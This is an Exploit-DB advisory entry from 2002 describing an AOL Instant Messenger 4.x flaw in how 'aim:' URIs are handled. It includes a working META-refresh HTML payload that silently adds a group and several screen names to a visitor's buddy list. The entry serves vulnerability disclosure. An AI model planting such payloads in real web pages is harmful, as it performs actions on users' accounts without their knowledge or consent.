AOL Instant Messenger 4.x - Unauthorized Actions

EDB-ID:

21619


Author:

orb

Type:

remote


Platform:

Windows

Date:

2002-07-16


source: https://www.securityfocus.com/bid/5246/info


The AOL Instant Messenger client is prone to an issue which may allow maliciously crafted HTML to perform unauthorized actions (such as adding entries to the buddy list) on behalf of the user of a vulnerable client. This condition is due to how the client handles "aim:" URIs. These actions will be taken without prompting or notifying the user.

This issue was reported for versions of AIM running on Microsoft Windows and MacOS. The Linux version of the client is not affected by this vulnerability.

<META HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg>

A web page loaded with the above code in the META REFRESH tag will
automatically add a group called mindfliporg and add the users mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to buddy list.